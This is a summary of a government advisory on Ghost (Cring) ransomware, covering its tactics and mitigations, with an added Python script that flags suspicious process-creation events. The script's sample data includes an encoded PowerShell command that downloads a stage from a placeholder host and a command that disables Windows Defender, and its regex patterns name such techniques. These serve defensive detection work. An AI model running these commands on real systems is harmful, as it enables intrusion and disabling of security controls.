#StopRansomware: Ghost (Cring) Ransomware | CISA

This joint Cybersecurity Advisory is part of the #StopRansomware initiative, which provides resources to help network defenders understand and mitigate threats from various ransomware variants; this advisory focuses on "Ghost" (also known as "Cring") ransomware. Investigations by the FBI, CISA, and the MS-ISAC disclosed the tactics, techniques, and procedures (TTPs) of this group, which has been active since early 2021, with activity observed as recently as January 2025.

Ghost actors, based in China, have indiscriminately targeted networks with outdated software across over 70 countries, affecting a range of organizations, including critical infrastructure entities, educational institutions, healthcare services, and various businesses. Their approach involves exploiting known vulnerabilities in public-facing applications, particularly through the use of publicly accessible code and unpatched Common Vulnerabilities and Exposures (CVEs).

Their modus operandi includes the deployment of various ransomware payloads, which they continuously rotate and modify, complicating attribution. Notable names and file samples associated with the ransomware include Cring.exe and Ghost.exe. Ghost actors have shown a penchant for exploiting known CVEs in Fortinet's FortiOS, Adobe ColdFusion, Microsoft SharePoint, and several vulnerabilities in the Microsoft Exchange ProxyShell attack chain.

Once access is gained, Ghost actors typically upload a web shell, then use PowerShell and the Windows Command Prompt to execute Cobalt Strike Beacon malware on victim systems. Although they typically spend only a short time on compromised networks, often moving from initial access to ransomware deployment within a day, their actions can include creating new accounts and modifying existing ones. Their primary aim, however, is immediate financial gain through encryption and ransom demands.

The advisory details each phase of a Ghost intrusion: initial access, execution, persistence, privilege escalation, credential access, defense evasion, discovery, lateral movement, exfiltration, command and control, and the impact of the ransomware itself. For instance, the actors rely heavily on Cobalt Strike not only to execute commands but also to undermine security controls, including disabling antivirus software such as Windows Defender. Their data exfiltration is usually minimal, with only limited data sent to actor-controlled servers, which limits the extent of data loss they can credibly claim in their ransom notes.

To mitigate Ghost ransomware attacks, organizations are encouraged to implement robust security controls such as regular patching of systems, network segmentation, multifactor authentication, user training on phishing awareness, and monitoring for unusual PowerShell usage. Maintaining verified backups is crucial, since organizations with unaffected backups can restore operations without paying a ransom.
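The "monitoring for unusual PowerShell usage" recommendation above, and the web shell to PowerShell to Defender-tampering chain described earlier, can be turned into concrete detection logic. The following Python script is an added example, not code from the advisory or from CISA; it runs a few defender-side checks over constructed process-creation records (the host names, user names, command lines and the 192.0.2.10 address are all made up for illustration): a web-server process spawning a shell, a Base64-encoded PowerShell command (which it decodes and inspects for download cradles), and Windows Defender tampering via Set-MpPreference.

```python
import base64
import re
from dataclasses import dataclass

# Constructed sample process-creation events (NOT from the advisory). Each
# record mimics the fields an analyst would pull from Windows Security
# Event ID 4688 or Sysmon Event ID 1: host, user, parent image, command line.
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage')"
    .encode("utf-16-le")  # PowerShell -EncodedCommand expects UTF-16LE Base64
).decode("ascii")

SAMPLE_EVENTS = [
    {"host": "WEB01", "user": r"IIS APPPOOL\DefaultAppPool", "parent": "w3wp.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_CRADLE}"},
    {"host": "WS07", "user": r"CORP\jdoe", "parent": "explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},  # benign
    {"host": "WEB01", "user": r"IIS APPPOOL\DefaultAppPool", "parent": "w3wp.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "DC01", "user": r"CORP\svc-backup", "parent": "powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
]

# Parent images that should not normally spawn interactive shells.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "tomcat.exe", "coldfusion.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# -e / -ec / -enc / -encodedcommand followed by a Base64 blob.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Typical in-memory download-and-execute patterns.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression|frombase64string",
    re.I)
# Common ways of weakening Windows Defender from the command line.
DEFENDER_TAMPER_RE = re.compile(
    r"set-mppreference\s+-disable|add-mppreference\s+-exclusion|sc\s+stop\s+windefend", re.I)


@dataclass
class Finding:
    host: str
    user: str
    reasons: list


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list:
    """Apply each detection rule to one event and return the reasons that fired."""
    reasons = []
    image = event["cmdline"].split()[0].lower().rsplit("\\", 1)[-1]
    if event["parent"].lower() in WEB_SERVER_PARENTS and image in SHELLS:
        reasons.append("web-server process spawned a shell (possible web shell)")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    # Inspect the decoded script when there is one, otherwise the raw command line.
    text = decoded if decoded is not None else event["cmdline"]
    if CRADLE_RE.search(text):
        reasons.append("download cradle / in-memory execution")
    if DEFENDER_TAMPER_RE.search(text):
        reasons.append("Windows Defender tampering")
    return reasons


def analyze(events: list) -> list:
    """Return a Finding for every event that triggered at least one rule."""
    findings = []
    for event in events:
        reasons = analyze_event(event)
        if reasons:
            findings.append(Finding(event["host"], event["user"], reasons))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"{finding.host} {finding.user}: {'; '.join(finding.reasons)}")
```

In a real deployment the same rules would run against events forwarded to a SIEM rather than an inline list; the point is that each of the three behaviours the advisory describes (web shell spawning a shell, encoded PowerShell pulling a stage from a remote host, and Defender being disabled) leaves a distinct, cheap-to-check signature in process-creation logs.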

The advisory also emphasizes validating security controls against the MITRE ATT&CK framework to confirm that defenses are effective. Incidents should be reported to the FBI's Internet Crime Complaint Center (IC3) or a local FBI field office, whether or not a ransom is paid. The advisory explicitly discourages paying ransoms, as payment does not guarantee recovery of files and may encourage further attacks.

The information in the report is provided for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any specific products or services mentioned, and organizations are encouraged to assess their cybersecurity posture against the Ghost ransomware threat and implement the necessary preventive measures.
